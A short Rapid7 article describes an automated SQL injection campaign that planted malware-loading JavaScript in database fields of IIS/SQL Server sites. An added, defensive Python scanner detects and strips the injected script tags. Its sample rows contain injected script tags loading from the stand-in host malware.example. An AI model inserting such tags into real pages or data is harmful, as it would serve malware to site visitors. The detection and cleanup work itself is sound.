Rapid7 - Automated SQL Injection Attacks 1 Million Servers
Web sites hit by an automated SQL injection attack have their page contents modified to point to malware that is automatically downloaded by any visitor to the site. These sites are all vulnerable to SQL injection (or have recently been vulnerable) and were compromised by this automated toolkit. In addition, by running a Google search on the malware server name, attackers can find sites that have already been exploited.
The "winzipices.cn" SQL injection attack is aimed at web applications built on Microsoft's IIS web server and SQL Server and has hit over 500,000 websites, including the United Nations, UK Government sites and the U.S. Department of Homeland Security. The automated attack takes advantage of the fact that Microsoft's SQL Server allows generic commands that don't require specific table-level arguments. The vulnerability is the result of poor input handling by the sites' developers, rather than a specific Microsoft flaw. The attack injects malicious JavaScript code into every text field in the database. The JavaScript is then rendered in the site's pages and loads an external script that can compromise a visitor's PC.
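A defender-side check matching the description above, added here as an example that is not from Rapid7 or the original article: scan text columns already exported from the database for injected external script tags, report which row, column and host they point at, and strip them for cleanup. The sample rows and the host malware.example are constructed data, not indicators from the page.

```python
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlparse

# Shape of the injected payload described in the article: a <script> tag whose
# src points at an external host, appended to otherwise legitimate field text.
# Handles both quoted and unquoted src attributes.
INJECTED_SCRIPT_RE = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']?(?P<src>https?://[^"\'\s>]+)["\']?[^>]*>\s*</script>',
    re.IGNORECASE,
)

# Constructed sample rows standing in for a dump of a content table.
SAMPLE_ROWS: List[Dict[str, str]] = [
    {"title": "Welcome", "body": "Hello world<script src=http://malware.example/1.js></script>"},
    {"title": 'About us<script src="http://malware.example/1.js"></script>', "body": "Plain text"},
    {"title": "Contact", "body": "No injection here"},
]


def find_injected_scripts(value: str) -> List[str]:
    """Return the src URL of every external <script> tag found in one text field."""
    return [m.group("src") for m in INJECTED_SCRIPT_RE.finditer(value)]


def clean_value(value: str) -> str:
    """Remove injected <script> tags and return the original field content."""
    return INJECTED_SCRIPT_RE.sub("", value)


def scan_table(rows: List[Dict[str, str]]) -> List[Tuple[int, str, str]]:
    """Scan every string column of every row; return (row index, column, src) findings."""
    findings: List[Tuple[int, str, str]] = []
    for i, row in enumerate(rows):
        for col, val in row.items():
            if isinstance(val, str):
                for src in find_injected_scripts(val):
                    findings.append((i, col, src))
    return findings


def injected_hosts(findings: List[Tuple[int, str, str]]) -> Set[str]:
    """Distinct hosts the injected scripts load from; the list to block and search for."""
    return {urlparse(src).hostname for _, _, src in findings if urlparse(src).hostname}


if __name__ == "__main__":
    for row, col, src in scan_table(SAMPLE_ROWS):
        print(f"row {row} column {col!r} loads {src}")
    print("hosts:", injected_hosts(scan_table(SAMPLE_ROWS)))
```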
About Rapid7:
Rapid7 is the leading provider of Unified Vulnerability Management (UVM) solutions. Rapid7 NeXpose UVM provides network, database and web application vulnerability management for enterprise deployments and small to medium businesses. Since its introduction, NeXpose has been sold to corporate enterprises, Global 2000 companies and government entities, and serves the full range of vertical markets across the U.S. and abroad. In addition, Rapid7 provides compliance products and services for PCI, HIPAA and Sarbanes-Oxley.